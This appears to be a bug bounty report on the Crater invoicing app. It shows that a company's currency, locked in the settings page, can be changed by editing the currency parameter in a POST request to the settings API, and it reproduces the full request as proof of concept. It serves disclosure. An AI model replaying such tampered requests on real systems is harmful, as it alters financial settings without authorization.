Description

It is found that comapny currency can not be changed since the field is disabled as shown in the screenshot but it can be changed by tampering the parameter.

Proof of Concept

Actual Request

POST /api/v1/company/settings HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: 
Content-Length: 3344
Origin: https://demo.craterapp.com
Connection: close
Referer: https://demo.craterapp.com/admin/settings/preferences
Cookie: 
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"settings":{"invoice_auto_generate":"YES","payment_auto_generate":"YES","estimate_auto_generate":"YES","save_pdf_to_disk":"NO","invoice_mail_body":"You have received a new invoice from <b>{COMPANY_NAME}</b>.</br> Please download using the button below:","estimate_mail_body":"You have received a new estimate from <b>{COMPANY_NAME}</b>.</br> Please download using the button below:","payment_mail_body":"Thank you for the payment.</b></br> Please download your payment receipt using the button below:","invoice_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY}  {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","invoice_shipping_address_format":"<h3>{SHIPPING_ADDRESS_NAME}</h3><p>{SHIPPING_ADDRESS_STREET_1}</p><p>{SHIPPING_ADDRESS_STREET_2}</p><p>{SHIPPING_CITY}  {SHIPPING_STATE}</p><p>{SHIPPING_COUNTRY}  {SHIPPING_ZIP_CODE}</p><p>{SHIPPING_PHONE}</p>","invoice_billing_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY}  {BILLING_STATE}</p><p>{BILLING_COUNTRY}  {BILLING_ZIP_CODE}</p><p>{BILLING_PHONE}</p>","estimate_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY}  {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","estimate_shipping_address_format":"<h3>{SHIPPING_ADDRESS_NAME}</h3><p>{SHIPPING_ADDRESS_STREET_1}</p><p>{SHIPPING_ADDRESS_STREET_2}</p><p>{SHIPPING_CITY}  {SHIPPING_STATE}</p><p>{SHIPPING_COUNTRY}  {SHIPPING_ZIP_CODE}</p><p>{SHIPPING_PHONE}</p>","estimate_billing_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY}  {BILLING_STATE}</p><p>{BILLING_COUNTRY}  {BILLING_ZIP_CODE}</p><p>{BILLING_PHONE}</p>","payment_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY}  {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","payment_from_customer_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY} {BILLING_STATE} {BILLING_ZIP_CODE}</p><p>{BILLING_COUNTRY}</p><p>{BILLING_PHONE}</p>","**currency":"1**","time_zone":"UTC","language":"en","fiscal_year":"2-1","carbon_date_format":"Y/m/d","moment_date_format":"YYYY/MM/DD","notification_email":"noreply@[email protected]","notify_invoice_viewed":"NO","notify_estimate_viewed":"NO","tax_per_item":"NO","discount_per_item":"NO","invoice_email_attachment":"NO","estimate_email_attachment":"NO","payment_email_attachment":"NO","retrospective_edits":"allow","invoice_number_format":"{{SERIES:INV}}{{DELIMITER:-}}{{SEQUENCE:6}}","estimate_number_format":"{{SERIES:EST}}{{DELIMITER:-}}{{SEQUENCE:6}}","payment_number_format":"{{SERIES:PAY}}{{DELIMITER:-}}{{SEQUENCE:6}}","estimate_set_expiry_date_automatically":"YES","estimate_expiry_date_days":"7","invoice_set_due_date_automatically":"YES","invoice_due_date_days":"7","bulk_exchange_rate_configured":"YES","estimate_convert_action":"no_action","automatically_expire_public_links":"YES"}}

In the above request you can see that currency value is set as 1 which is US dollar which can not be changed as per the screenshot.
But changing the value to 2, currency gets changed.

Impact

Since different currency have different value, it might affect the company financially.